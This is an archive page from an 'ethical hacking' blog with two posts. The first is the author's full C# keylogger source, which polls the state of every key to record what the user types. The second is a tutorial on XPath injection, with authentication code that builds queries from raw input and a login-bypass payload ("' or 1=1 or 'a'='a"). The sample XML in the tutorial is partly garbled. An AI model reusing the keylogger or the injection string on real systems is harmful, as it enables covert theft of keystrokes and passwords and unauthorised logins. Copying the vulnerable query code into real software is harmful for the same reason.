INDIAN ETHICAL HACKING(I.E.H): November 2011

Wednesday, 9 November 2011

KEY LOGGER IN C#

This is the keylogger code which i have coded

Source code :-

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using System.Windows.Forms;
using System.Runtime.InteropServices;

public class KeyLog
{
//-> Declare GetAsyncKeyState().
[DllImport("User32.dll")]
private static extern short GetAsyncKeyState(Keys vKey); //To check the current status of a virtual key.
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(Int32 vKey); //To check the current status of a virtual key.
[DllImport("user32.dll")]
private static extern short GetKeyState(Keys vKey); //To check if a key is currently toggled (on/off).
[DllImport("user32.dll")]
private static extern short GetKeyState(Int32 vKey); //To check if a key is currently toggled (on/off).

//-> getKey() checks what keys have been pressed and returns the pressed keys, if any.
//-> Otherwise, returns null.
//-> The pressed keys are returned in a List<string> as (string)char/key name.
public List<string> getKey()
{
List<string> myKeys = new List<string>(); //Declare the list of keys as int.
for (int i = 0; i <= 255; i++) //Go through all key codes to check if any key is pressed.
{
int j = GetAsyncKeyState(i); //Get state of key i.
if (j == -32767) //Check if key is pressed.
{
if (i >= 65 && i <= 122) //From char 65 to 122
{
if (ShiftKey && CapsLock) //If Shift and CapsLock are toggled.
myKeys.Add(((char)(i + 32)).ToString()); //Lower case.
else if (ShiftKey) //If Shift or CapsLock is toggled.
myKeys.Add(((char)(i)).ToString()); //Upper case.
else if (CapsLock) //If Shift or CapsLock is toggled.
myKeys.Add(((char)(i)).ToString()); //Upper case.
else //Any other situation.
myKeys.Add(((char)(i + 32)).ToString()); //Lower case.
}
else if (i >= 48 && i <= 57) //From char 48 to 57
{
if (ShiftKey) //If Shift is toggled.
myKeys.Add(((char)(i - 16)).ToString()); //Symbols.
else //If Shift is not toggled.
myKeys.Add(((char)(i)).ToString()); //Numbers.
}
else
myKeys.Add(Enum.GetName(typeof(Keys), i)); //Any other situation.

//Check keys toggled
if (ShiftKey && !(myKeys.Contains(Keys.ShiftKey.ToString())))
myKeys.Add(Keys.ShiftKey.ToString()); //Add 'ShiftKey' if enabled.
if (ShiftKeyL && !(myKeys.Contains(Keys.LShiftKey.ToString())))
myKeys.Add(Keys.LShiftKey.ToString()); //Add 'LShiftKey' if enabled.
if (ShiftKeyR && !(myKeys.Contains(Keys.RShiftKey.ToString())))
myKeys.Add(Keys.RShiftKey.ToString()); //Add 'RShiftKey' if enabled.
if (ControlKey && !(myKeys.Contains(Keys.ControlKey.ToString())))
myKeys.Add(Keys.ControlKey.ToString()); //Add 'ControlKey' if enabled.
if (ControlKeyL && !(myKeys.Contains(Keys.LControlKey.ToString())))
myKeys.Add(Keys.LControlKey.ToString()); //Add 'LControlKey' if enabled.
if (ControlKeyR && !(myKeys.Contains(Keys.RControlKey.ToString())))
myKeys.Add(Keys.RControlKey.ToString()); //Add 'RControlKey' if enabled.
if (AltKey && !(myKeys.Contains(Keys.Menu.ToString())))
myKeys.Add(Keys.Menu.ToString()); //Add 'Menu' (Alt key) if enabled.
if (AltKeyL && !(myKeys.Contains(Keys.LMenu.ToString())))
myKeys.Add(Keys.LMenu.ToString()); //Add 'LMenu' if enabled.
if (AltKeyR && !(myKeys.Contains(Keys.RMenu.ToString())))
myKeys.Add(Keys.RMenu.ToString()); //Add 'RMenu' if enabled.
if (CapsLock && (!(myKeys.Contains(Keys.CapsLock.ToString())) && !(myKeys.Contains(Keys.CapsLock.ToString() + "[Enabled]"))))
myKeys.Add(Keys.CapsLock.ToString() + "[Enabled]"); //Add 'CapsLock[Enabled]' if enabled.
if (NumLock && (!(myKeys.Contains(Keys.NumLock.ToString())) && !(myKeys.Contains(Keys.NumLock.ToString() + "[Enabled]"))))
myKeys.Add(Keys.NumLock.ToString() + "[Enabled]"); //Add 'NumLock' if enabled.
}
}

return myKeys; //Return the list.
}

//-> Get keys toogle state (on/off).
#region Toggles
public static bool ControlKey
{
get { return Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey)); }
}
public static bool ControlKeyL
{
get { return Convert.ToBoolean(GetAsyncKeyState(Keys.LControlKey)); }
}
public static bool ControlKeyR
{
get { return Convert.ToBoolean(GetAsyncKeyState(Keys.RControlKey)); }
}
public static bool ShiftKey
{
get { return Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey)); }
}
public static bool ShiftKeyL
{
get { return Convert.ToBoolean(GetAsyncKeyState(Keys.LShiftKey)); }
}
public static bool ShiftKeyR
{
get { return Convert.ToBoolean(GetAsyncKeyState(Keys.RShiftKey)); }
}
public static bool AltKey
{
get { return Convert.ToBoolean(GetAsyncKeyState(Keys.Menu)); }
}
public static bool AltKeyL
{
get { return Convert.ToBoolean(GetAsyncKeyState(Keys.LMenu)); }
}
public static bool AltKeyR
{
get { return Convert.ToBoolean(GetAsyncKeyState(Keys.RMenu)); }
}
public static bool CapsLock
{
get { return Convert.ToBoolean(GetKeyState(Keys.CapsLock)); }
}
public static bool NumLock
{
get { return Convert.ToBoolean(GetKeyState(Keys.NumLock)); }
}
#endregion
}

XPATH INJECTION

Today we will be learning about Xpath injection

First of all for understanding this attack you need to have knowledge about

1)XML

2)HTML or XHTML

What is xpath ??

XPath is a syntax for defining parts of an XML document.

XPath uses path expressions to navigate in XML documents .

XPath contains a library of standard functions.

XPath is a major element in XSLT.

XPath is a W3C recommendation.

Xpath injection is similar to Sql injection i.e, sql injection occurs when user supplies information and xpath injecion also occurs when the user supplies the input for construing xpath query .By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication .

Xml querying can be done using XPATH ,a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find, and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data.

XPath is a standard language; its notation/syntax is always implementation independent, which means the attack may be automated. There are no different dialects as it takes place in requests to the SQL databeses.

Because there is no level access control it's possible to get the entire document. We won't encounter any limitations as we may know from SQL injection attacks.

Example :-

Lets take a xml document

<firstname>Arnold</firstname>

<lastname>Baker</lastname>

<username>ABaker</username>

<password>SoSecret</password>

<type>Admin</type>

</employee>

<firstname>Peter</firstname>

<password>NotTelling</password>

</employee>

</employees>

Below code is used for user authentication

VB:

Dim FindUserXPath as String

FindUserXPath = "//Employee[UserName/text()='" & Request("Username") & "' And

Password/text()='" & Request("Password") & "']"

C#:

String FindUserXPath;

FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' And

Password/text()='" + Request("Password") + "']";

When normal user enters his username and password above code will work perfectly

But when a attacker uses malicious strings like below

Username: blah' or 1=1 or 'a'='a

Password: blah

FindUserXPath becomes //Employee[UserName/text()='blah' or 1=1 or

'a'='a' And Password/text()='blah']

Logically this is equivalent to:

//Employee[(UserName/text()='blah' or 1=1) or

('a'='a' And Password/text()='blah')]

In this code Xpath will show true because of 1=1 is always true no matter what happens and it is simliar to the sql injection

In this way a attacker can have a user access

Your IP by I.EH Radar

Wednesday, 9 November 2011

KEY LOGGER IN C#

XPATH INJECTION